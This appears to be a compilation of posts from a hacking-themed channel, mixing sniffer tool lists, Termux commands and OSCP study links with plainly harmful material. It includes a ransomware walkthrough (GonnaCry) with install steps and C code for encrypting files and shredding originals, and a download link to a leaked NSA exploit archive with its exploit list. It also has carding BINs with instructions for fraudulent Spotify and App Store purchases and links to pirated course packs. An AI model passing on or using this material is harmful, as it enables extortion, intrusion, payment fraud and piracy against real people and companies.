▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

🦑Sniffers tools & protocol analyzers☠️


[tcpdump/libpcap](http://www.tcpdump.org/) - Common packet analyzer that runs under the command line.

Wireshark - Widely-used
graphical, cross-platform network protocol analyzer.

[netsniff-ng](https://github.com/netsniff-ng/netsniff-ng) - Swiss army knife for for network sniffing.

Dshell - Network forensic analysis framework.

[Debookee](http://www.iwaxx.com/debookee/) - Simple and powerful network traffic analyzer for macOS.

Dripcap - Caffeinated packet analyzer.

✅git topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

> Bug Bounty Hunting :

https://mega.nz/folder/qgxFUbQT#MnXfoQ2QfCHsptJ5IZu0Dg

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

🦑2020 ransomware :

> A ransomware is a form of malware that prevent legitimate users from accessing their device or data and asks for a payment in exchange for the stolen functionality. They have been used for mass extortion in various forms, but the most successful seem to be encrypting ransomware: most of the user data are encrypted and the key can be retrieved with a payment to the attacker. To be widely successful a ransomware must fulfill three properties:



🦑FEATURES

>encrypt all user files with AES-256-CBC.
>Random AES key and IV for each file.
>Works even without internet connection.
>Communication with the server to decrypt Client-private-key.
>encrypt AES key with client-public-key RSA-2048.
>encrypt client-private-key with RSA-2048 server-public-key.
>Change computer wallpaper -> Gnome, LXDE, KDE, XFCE.
>Decryptor that communicate to server to send keys.
>python webserver
>Daemon
>Kill databases

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1️⃣DOWNLOAD OR CLONE https://github.com/tarcisio-marinho/GonnaCry

2️⃣go dir then

3️⃣First the ransomware needs to know some path’s, such as the desktop directory path, trash, home, etc…
To get the user and home directory i will use some glibc librarys from unistd.h 12

char * home = get_home_enviroment(); // /home/USER/
char * desktop = get_desktop_enviroment(home); // /home/USER/Desktop/
char * username = get_username(); USERNAME
char * trash = get_trash_path(home); // /home/USER/.local/share/Trash/
char * media = get_media_path(username);
With the paths we can enter in each folder, find files inside it, create new files, whatever we want.

> First part - Finding the files

4️⃣For each file in the list, he will try to open and create a new file.

old = fopen(files->info[2], "rb");
if(old != NULL){
new_name = (char*) malloc(sizeof(char) * (strlen(files->info[2]) + 11));
strcpy(new_name, files->info[2]);
strcat(new_name, ".GNNCRY");
new = fopen(new_name, "wb");

5️⃣Generate a unique random key and IV for each file and call encrypt function(I let you guess what it does :slight_smile:).

6️⃣After the encryption, now we need to shred the old file, to never come back.

7️⃣Now the old file bytes are overwritten with zeros, and then deleted.
Even with some recovery tool software, the original file is lost.

goto Second part - Start Encryption; //This repeats for each file on the linked list.

Third part - create Desktop file: enc_files.gc

This file will help the decryptor to get the path, key and iv used to encrypt each file.
First field is the random Key, then the random IV and the file path.

🦑VIDEO TUTORIAL : https://youtu.be/pLluFxHrc30

ENJOY❤️👍🏻
✅2020 GIT SOURCES
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

🦑TERMUX COMMANDS :

> Search for the specific package in termux:
pkg search package-name
It will show you all the package related to that package name.


>List all the available packages in termux:
pkg list-all
it will show you all the packages that are available in the APT repository of termux.


>Install a Package:
pkg install packageName
you can install any package from the list, just type pkg install package-name.


>Uninstall a Package:
pkg uninstall packageName
you can uninstall any package from the list, just type pkg uninstall package-name.it will ask you where if you wanna delete the package or not press y and the package will be uninstalled.


>Install Python in termux:
pkg install python
Just type this command and it will be installed in your termux press y if it asks for confirmation.after installing python you can write code and also run your own python scripts. Type python to check if python is properly installed or not.


>Install Git in termux:
pkg install git
Git will allow you to download any project from the github.


>Download projects from GitHub repository :
git clone Link-of-the-project
If you want to download any project from the git hub you can just use the above just change the Link-of-the-project with your link
e.g: git clone https://github.com/adi1090x/termux-style.git


>Check all the running processes in termux:
top
This command will show you all the tasks running on your termux. To quit the top command on termux just press CTRL+C on your keyboard.

🦑Need more ?
>https://www.learntermux.tech/2020/01/basic-commands-in-termux.html

ENJOY❤️👍🏻
✅2020Termux
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

mega pack. collection of ebooks and videos —32.4gb—

https://tattoosmart.com/collections/books-media

https://mega.nz/#F!CExiDKTQ!lAPDLTAxxXVUMgSDFq7grA

BACK

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

🦑NSA LEAK⭐️ —235 MGS—


https://mega.nz/#!zEAU1AQL!oWJ63n-D6lCuCQ4AY0Cv_405hX8kn7MEsa1iLH5UjKU

10 % OF FEATURES ! :


> Remote Code Execution

> Netscape Server
>xp_ns-httpd NetScape Server RCE
>nsent RCE for NetScape Enterprise server 4.1 for Solaris
>eggbasket another NetScape Enterprise RCE, this time version 3.5, likely SPARC only

>FTP servers
>EE proftpd 1.2.8 RCE, for RHL 7.3+/Linux, CVE-2011-4130? another reason not to use proftpd

>wuftpd likely CVE-2001-0550


>ESMARKCONANT exploits phpBB remote command execution (<2.0.11) CVE-2004-1315

>ELIDESKEW Public known vulnerablity in SquirrelMail versions 1.4.0 - 1.4.7

>ELITEHAMMER Runs against RedFlag Webmail 4, yields user nobody

>ENVISIONCOLLISION RCE for phpBB (derivative)

>EPICHERO RCE for Avaya Media Server

>COTTONAXE RCE to retrieve log and information on LiteSpeed Web Server


>calserver spooler RPC based RCE

>EARLYSHOVEL RCE RHL7 using sendmail CVE-2003-0681 CVE-2003-0694

>ECHOWRECKER/sambal: samba 2.2 and 3.0.2a - 3.0.12-5 RCE (with
>DWARF symbols), for FreeBSD, OpenBSD 3.1, OpenBSD 3.2 (with a non-executable stack, zomg), and Linux. Likely CVE-2003-0201. There is also a Solaris version

>ELECTRICSLIDE RCE (heap-overflow) in Squid, with a chinese-looking vector

>EMBERSNOUT a remote exploit against Red Hat 9.0's httpd-2.0.40-21

>ENGAGENAUGHTY/apache-ssl-linux Apache2 mod-ssl RCE (2008), SSLv2

>ENTERSEED Postfix RCE, for 2.0.8 - 2.1.5
ERRGENTLE/xp-exim-3-remote-linux Exim remote root, likely
>CVE-2001-0690, Exim 3.22 - 3.35
EXPOSITTRAG exploit pcnfsd version 2.x

>extinctspinash: Chili!Soft ASP stuff RCE? and Cobalt RaQ too?

>KWIKEMART (km binary) RCE for SSH1 padding crc32 thingy (https://packetstormsecurity.com/files/24347/ssh1.crc32.txt.html)

>prout (ab)use of pcnfs RPC program (version 2 only) (1999)

>slugger: various printers RCE, looks like CVE-1999-0078

>statdx Redhat Linux 6.0/6.1/6.2 rpc.statd remote root exploit (IA32)
telex Telnetd RCE for RHL? CVE-1999-0192?

>toffeehammer RCE for cgiecho part of cgimail, exploits fprintf
VS-VIOLET Solaris 2.6 - 2.9, something related to XDMCP
SKIMCOUNTRY Steal mobile phone log data

.SLYHERETIC_CHECKS Check if a target is ready for SLYHERETIC (not included)

>EMPTYBOWL RCE for MailCenter Gateway (mcgate) - an application that comes with Asia Info Message Center mailserver; buffer overflow allows a string passed to popen() call to be controlled by an attacker; arbitraty cmd execute known to work only for AIMC Version 2.9.5.1

>CURSEHAPPY Parser of CDR (Call Detail Records) (siemens, alcatel, other containing isb hki lhr files) probably upgrade of ORLEANSTRIDE
ORLEANSTRIDE Parser of CDR (Call Detail Records)

Enjoy❤️👍🏻
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁


🦑HACKERS REAL TIPS
#fAStTips

>Data-driven attack
A data-driven attack refers to an attack launched when a seemingly harmless special program sent or copied by a hacker to a target computer is executed. This attack allows hackers to modify files related to network security on the target computer, making it easier for hackers to invade the target computer next time. Data-driven attacks mainly include buffer overflow attacks, format string attacks, input verification attacks, synchronization vulnerability attacks, and trust vulnerability attacks.

>Forged information attack
Forged information attack refers to hackers sending fake routing information to construct a false path between the source computer and the target computer, so that the data packets flowing to the target computer pass through the computer operated by the hacker, so as to obtain the bank account in these data packets Personal sensitive information such as passwords.

>Attacks against information protocol weaknesses
In a local area network, the source path option of the IP address allows the IP packet to choose a path to the target computer. When a hacker tries to connect to an unreachable computer A located behind the firewall, he only needs to set the IP address source path option in the sent request packet, so that a destination address of the packet points to the firewall, but the final address points to Computer A. When the packet reaches the firewall, it is allowed to pass because it points to the firewall instead of computer A. The source path of the firewall's IP layer to process the message was changed and sent to the internal network, the message thus reached the unreachable computer A, thereby achieving a vulnerability attack on the information protocol.

>Remote control
Remote manipulation refers to a hacker launching an executable program in the target computer, the program will display a fake login interface, when the user enters account, password and other login information in the interface, the program will enter the account and password entered by the user To the hacker’s computer. At the same time, the program closes the login interface, prompting the message "System has failed" and asking the user to log in again. This attack is similar to phishing websites that are often encountered on the Internet.

>Attack by mistake of system administrator
In the local area network, people are one of the most important factors for the security of the local area network. When the system administrator makes mistakes such as configuration errors of the WWW server system and ordinary users expand user rights, these mistakes can provide hackers with an opportunity. Hackers use these mistakes, plus the command of finger, netstat, etc., to achieve intrusion attacks.

enjoy❤️👍🏻
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

SPOTIFY + MULTI BIN

BIN : 519472xxxxxxxxxx

IP : Algeria

CHANGE SPOTIFY COUNTRY TO TUNISIA 🇹🇳

✅CREDIT : Mrklez01

BIN APPSTORE (itunes)

| BIN: 49157350117xxxxx
| FECHA: 11/23
| CVV: Generado

| IP: MEXICO

LEARNING CRACKING Professional WI-FI PASSWORD KEYS --WEP/WPAWPA2

https://mega.nz/folder/YyglXD5C#LcziK011TVYLKj3oHXs5VQ/folder/Ur4nSBoQ

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

🦑Common errors leading to deanonymization:

1. Anonymity in social networks
If you are registered in vk (social network) by entering your phone number. Then they connected to vk via Tor in order to write “Nikiforov S.S. thief". Does this mean that you are anonymous - did you use Tor?

No, it doesn’t. If only because a phone number is tied to your social network account. And for your identification, the IP address is not particularly needed.

2. Anonymity and cookies
Cookies are small pieces of information that are stored in your web browser after the site sends them to you.

If you went to the site, received your cookies, then reconnected via Tor and wrote in the comments something like “deputy of the second convocation of the City Duma Petrov D.S. also a thief ”, then cookies can link the author of a comment and a user who has previously logged in with a different IP address.

Cookies are designed to identify the user regardless of your IP address.

3. Many sites store the IP of previous actions
For example, I registered a VPN account to which I will connect through Tor. But I registered it from my IP (“because Tor is slow, and indeed that site does not accept connections from the Tor network). Will I be anonymous if I connect to a VPN via Tor? No, because information about previous operations with the IP address is saved.

4. I WILL BUY a VPN (or VPS server to configure OpenVPN) and will be anonymous
Even if you read the third paragraph and went to register through Tor, but use wallets that can lead to you, then there is no question of any anonymity. Moreover, when buying one-time SIM cards and when entering the wallet sites, you also need to remember about your anonymity, otherwise it is all just meaningless.

That is why just Tor is more anonymous than Tor + OpenVPN. It is quite difficult to buy something without leaving a trace.

5. OpenVPN is very good, but not for anonymity
If we recall the original purpose of VPN networks, then this is an organization of virtual private networks, inside of which computers scattered around the world, can access each other's local network resources. At the same time, traffic exchange is encrypted, but this traffic is encrypted only for an external observer, but not for the server and clients of the OpenVPN network.

For this reason, if you purchased a free or paid VPN account, then be prepared that the server owner can do with your traffic WHAT PLEASANT and keeps activity logs - what requests were made from which client.

6. There are 1000 and 1 ways to find out the real IP address of a remote user
Options are from the simplest to send a link to a controlled site and see the IP (if communicating through an anonymous messenger) or a file with a trojan to completely sophisticated methods.

7. If you use any software with closed source code for illegal activities, then there is 100% backdoor installed
Backdoors can also be in legitimate software with closed source code - as a hard-to-detect vulnerability that the manufacturer knows about, or just an ordinary backdoor that is dumb like a cork - these were found, for example, in the official firmware of routers.

As for the illegal software with closed source code that is distributed anonymously, please tell me, well, why not install a backdoor there? The owner does not know anything, and even if he finds out what he will do? He’ll go to the police and say: I bought scripts to crack the protection of stolen phones, and they installed a virus there ... It’s unlikely that he will.


8. Misunderstanding of the simplest technical aspects of the operation of networks, servers, applications, information accumulated and available in open sources
In my articles, the links to which I gave above, I found the sites of the attacker simply by analyzing where the POST request goes. Why did the attacker leave scripts on this site in the archive? Apparently, I just did not know that it is very easy to track where the POST request goes even if the HTML code is obfuscated.

And there can be many such “technical” punctures: a simple SSH connection password (“no one knows where my server is”), a misunderstanding of what information the researcher can get on the server, a misunderstanding why Cloudflare is needed, etc.

9. The big picture
Example: infrastructure objects and IP traces are attacked and other indirect signs lead to somewhere far away. But at the same time, the objects and methods of attack are similar to those used by the well-known hacker group. At least there is reason to think.

10. Metadata in files

ENJOY❤️👍🏻
written by
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

🦑OSCP_Helpful_Links.md

OSCP Course Review
Offensive Security’s PWB and OSCP — My Experience
http://www.securitysift.com/offsec-pwb-oscp/

OSCP Journey
https://scriptkidd1e.wordpress.com/oscp-journey/

Down with OSCP
http://ch3rn0byl.com/down-with-oscp-yea-you-know-me/

Jolly Frogs - Tech Exams (Very thorough)

http://www.techexams.net/forums/security-certifications/110760-oscp-jollyfrogs-tale.html

OSCP Inspired VMs and Walkthroughs
https://www.hackthebox.eu/

https://www.root-me.org/

https://www.vulnhub.com/

Walk through of Tr0ll-1 - Inspired by on the Trolling found in the OSCP exam
https://highon.coffee/blog/tr0ll-1-walkthrough/
Another walk through for Tr0ll-1
https://null-byte.wonderhowto.com/how-to/use-nmap-7-discover-vulnerabilities-launch-dos-attacks-and-more-0168788/
Taming the troll - walkthrough
https://leonjza.github.io/blog/2014/08/15/taming-the-troll/
Troll download on Vuln Hub
https://www.vulnhub.com/entry/tr0ll-1,100/

Sickos - Walkthrough:
https://highon.coffee/blog/sickos-1-walkthrough/
Sickos - Inspired by Labs in OSCP
https://www.vulnhub.com/series/sickos,70/

Lord of the Root Walk Through
https://highon.coffee/blog/lord-of-the-root-walkthrough/
Lord Of The Root: 1.0.1 - Inspired by OSCP
https://www.vulnhub.com/series/lord-of-the-root,67/

Tr0ll-2 Walk Through
https://leonjza.github.io/blog/2014/10/10/another-troll-tamed-solving-troll-2/
Tr0ll-2
https://www.vulnhub.com/entry/tr0ll-2,107/

Cheat Sheets
Penetration Tools Cheat Sheet
https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/

Pen Testing Bookmarks
https://github.com/kurobeats/pentest-bookmarks/blob/master/BookmarksList.md

OSCP Cheatsheets
https://github.com/slyth11907/Cheatsheets

CEH Cheatsheet
https://scadahacker.com/library/Documents/Cheat_Sheets/Hacking%20-%20CEH%20Cheat%20Sheet%20Exercises.pdf

Net Bios Scan Cheat Sheet
https://highon.coffee/blog/nbtscan-cheat-sheet/

Reverse Shell Cheat Sheet
https://highon.coffee/blog/reverse-shell-cheat-sheet/

NMap Cheat Sheet
https://highon.coffee/blog/nmap-cheat-sheet/

Linux Commands Cheat Sheet
https://highon.coffee/blog/linux-commands-cheat-sheet/

Security Hardening CentO 7
https://highon.coffee/blog/security-harden-centos-7/

MetaSploit Cheatsheet
https://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf

Google Hacking Database:
https://www.exploit-db.com/google-hacking-database/

Windows Assembly Language Mega Primer
http://www.securitytube.net/groups?operation=view&groupId=6

Linux Assembly Language Mega Primer
http://www.securitytube.net/groups?operation=view&groupId=5

Metasploit Cheat Sheet
https://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf

ENJOY❤️👍🏻
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

🦑Crypto Tading :
#Requested

https://academy.investopedia.com/products/crypto-trading


https://mega.nz/folder/aAxURAZD#DX76HLJpyvTXjJTJMH7TNw

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

🦑Do I need to use Tor with VPN, proxy, SSH?


> This is a common question in different variations. And there is no definite answer to it. Suppose in my country or my Internet service provider is blocking access to the Tor network, then not so much good as the only solution is to use VPN + Tor. At the same time,

> so i must clearly understand the risks of a VPN, which is designed for organizing virtual private networks, and not anonymity. If I DO NOT understand the risks of adding different intermediate nodes, and I just do it because I read something better on some forum, then this is a bad idea: there is no working technology to find out the real IP address of a Tor network user, but VPN “honeypot "Will know everything about you:

1️⃣your real IP address

2️⃣what sites did you make requests to
what answers received

3️⃣Further translation from the pages of the official Tor Project documentation. I agree with these views, provided that there is trust in the Tor network. I do NOT have 100% trust in the Tor network, but of the other options for hiding my IP, this is the best solution.

🦑Sources:

https://support.torproject.org/faq/faq-5/

https://trac.torproject.org/projects/tor/wiki/doc/TorPlusVPN

Share us❤️👍🏻
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁